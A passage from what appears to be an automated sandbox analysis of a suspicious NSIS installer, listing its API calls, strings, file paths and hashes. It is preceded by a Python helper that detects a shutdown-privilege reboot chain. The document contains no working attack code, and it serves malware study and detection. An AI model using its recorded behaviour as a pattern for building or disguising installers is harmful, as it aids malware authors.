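    (subcall lines ignored), or None. Calls are ordered by address because the
    plugin does not always print them in code order."""
    stages = [
        lambda c: c.api == "OpenProcessToken",
        lambda c: c.api.startswith("LookupPrivilegeValue") and "SeShutdownPrivilege" in c.args,
        lambda c: c.api == "AdjustTokenPrivileges",
        lambda c: c.api == "ExitWindowsEx",
    ]
    chain, stage = [], 0
    for c in sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref):
        if stage < len(stages) and stages[stage](c):
            chain.append(c)
            stage += 1
    return chain if stage == len(stages) else None


def env_overrides(calls: List[ApiCall]) -> List[tuple]:
    """(variable, value) pairs for every SetEnvironmentVariable call of the function."""
    return [(c.args[0], c.args[1]) for c in calls
            if c.api.startswith("SetEnvironmentVariable") and c.subcall_of is None]


if __name__ == "__main__":
    parsed = parse_api_listing(SAMPLE)
    chain = find_reboot_sequence(parsed)
    print("env overrides:", env_overrides(parsed))
    if chain:
        print("reboot chain at", [hex(c.ref) for c in chain],
              decode_exit_windows_ex(chain[-1].args))
```

Run against the full listing of a function, the parser keeps subcall lines separate from the function's own calls, so that a privilege lookup buried in a helper is not mistaken for the caller's behaviour. Ordering by call-site address is an approximation of control flow; for a function whose reboot path is not straight-line code, check the chain against the control-flow graph before relying on it.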

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        [Control-flow graph of the function at 0x40523f (basic blocks 0x40523f-0x4055c2); the rendered graph's edge list is not reproduced here, the API calls it references are listed under APIs below]
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040529E
                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004052AD
                                                                                        • GetClientRect.USER32(?,?), ref: 004052EA
                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004052F1
                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405312
                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405323
                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405336
                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405344
                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405357
                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405379
                                                                                        • ShowWindow.USER32(?,?), ref: 0040538D
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053AE
                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053BE
                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053D7
                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053E3
                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004052BC
                                                                                          • Part of subcall function 0040409D: SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004053FF
                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 00405414
                                                                                        • ShowWindow.USER32(00000000), ref: 00405437
                                                                                        • ShowWindow.USER32(?,?), ref: 0040543E
                                                                                        • ShowWindow.USER32(?), ref: 00405484
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054B8
                                                                                        • CreatePopupMenu.USER32 ref: 004054C9
                                                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054DE
                                                                                        • GetWindowRect.USER32(?,000000FF), ref: 004054FE
                                                                                        • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405517
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405553
                                                                                        • OpenClipboard.USER32(00000000), ref: 00405563
                                                                                        • EmptyClipboard.USER32 ref: 00405569
                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 0040557C
                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405590
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004055A9
                                                                                        • SetClipboardData.USER32(?,00000000), ref: 004055B4
                                                                                        • CloseClipboard.USER32 ref: 004055BA
                                                                                        Strings
                                                                                        • Trochidae Setup: Installing, xrefs: 0040552F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                        • String ID: Trochidae Setup: Installing
                                                                                        • API String ID: 590372296-4121273588
                                                                                        • Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                        • Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
                                                                                        • Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
                                                                                        • Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        [Control-flow graph of the function at 0x4057a2 (basic blocks 0x4057a2-0x40596f, recursing into itself at 0x4058af); the rendered graph's edge list is not reproduced here, the API calls it references are listed under APIs below]
                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
                                                                                        • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
                                                                                        • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
                                                                                        • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
                                                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
                                                                                        • FindClose.KERNEL32(00000000), ref: 00405909
                                                                                        Strings
                                                                                        • \*.*, xrefs: 0040580D
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 004057A2
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                        • API String ID: 2035342205-1946058045
                                                                                        • Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                        • Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
                                                                                        • Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
                                                                                        • Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        [Control-flow graph of the function at 0x401759 (basic blocks 0x401759-0x4029c7); the rendered graph's edge list is not reproduced here, the API calls it references are listed under APIs below]
                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 00401798
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers,00000000,00000000,00000031), ref: 004017C2
                                                                                          • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,?,0000000A), ref: 00405FE7
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                          • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                          • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                          • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                          • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp$C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$Call
                                                                                        • API String ID: 1941528284-439225009
                                                                                        • Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                        • Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
                                                                                        • Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                        • Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                        • Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
                                                                                        • Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
                                                                                        • Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FindFirstFileA.KERNELBASE(76403410,00421558,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,C:\Users\user\AppData\Local\Temp\nsz7A32.tmp,76403410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,76403410,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
                                                                                        • FindClose.KERNEL32(00000000), ref: 004062F4
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp\nsz7A32.tmp, xrefs: 004062DD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp
                                                                                        • API String ID: 2295610775-3296606243
                                                                                        • Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                        • Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
                                                                                        • Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
                                                                                        • Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                         Control-flow Graph
                                                                                         • Rendered graph omitted; entry basic block 403b94-403ba6 (dialog procedure passed to DialogBoxParamA; SetWindowPos, ShowWindow, DestroyWindow, GetDlgItem, SendMessageA, SetWindowTextA and CreateDialogParamA reachable from it)
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
                                                                                        • ShowWindow.USER32(?), ref: 00403BED
                                                                                        • DestroyWindow.USER32 ref: 00403C01
                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
                                                                                        • GetDlgItem.USER32(?,?), ref: 00403C3E
                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C52
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403C59
                                                                                        • GetDlgItem.USER32(?,?), ref: 00403D07
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D11
                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
                                                                                        • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D7C
                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403E22
                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403E43
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
                                                                                        • EnableWindow.USER32(?,?), ref: 00403E70
                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E86
                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403E8D
                                                                                        • SendMessageA.USER32(?,?,00000000,?), ref: 00403EA5
                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403EB8
                                                                                        • lstrlenA.KERNEL32(Trochidae Setup: Installing,?,Trochidae Setup: Installing,00000000), ref: 00403EE2
                                                                                        • SetWindowTextA.USER32(?,Trochidae Setup: Installing), ref: 00403EF1
                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404025
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                        • String ID: Trochidae Setup: Installing
                                                                                        • API String ID: 3282139019-4121273588
                                                                                        • Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                        • Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
                                                                                        • Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                        • Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                         Control-flow Graph
                                                                                         • Rendered graph omitted; entry basic block 4037f7-40380f (calls 406372; lstrcatA, LoadImageA, RegisterClassA, CreateWindowExA, GetClassInfoA and DialogBoxParamA reachable from it)
                                                                                        APIs
                                                                                          • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                          • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                        • lstrcatA.KERNEL32(1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\jU0hAXFL0k.exe",00000000), ref: 00403872
                                                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,76403410), ref: 004038E7
                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                          • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                                                        • RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                        • SystemParametersInfoA.USER32(?,00000000,?,00000000), ref: 004039A3
                                                                                        • CreateWindowExA.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039D8
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A0E
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
                                                                                        • RegisterClassA.USER32(00422EA0), ref: 00403A50
                                                                                        • DialogBoxParamA.USER32(?,00000000,00403B94,00000000), ref: 00403A6F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Trochidae Setup: Installing$_Nb
                                                                                        • API String ID: 1975747703-80757779
                                                                                        • Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                        • Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
                                                                                        • Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                        • Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph
                                                                                        • Graph rendering not recoverable in text; function entry block 402dc4-402e12 (GetTickCount, GetModuleFileNameA, call 405b73), exit block 402ff4-402ff8
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402DD5
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\jU0hAXFL0k.exe,00000400), ref: 00402DF1
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00402E3D
                                                                                        • GlobalAlloc.KERNELBASE(?,00000020), ref: 00402F73
                                                                                        Strings
                                                                                        • Null, xrefs: 00402EBB
                                                                                        • Error launching installer, xrefs: 00402E14
                                                                                        • soft, xrefs: 00402EB2
                                                                                        • C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
                                                                                        • C:\Users\user\Desktop\jU0hAXFL0k.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                                                                        • Inst, xrefs: 00402EA9
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00402DC4
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
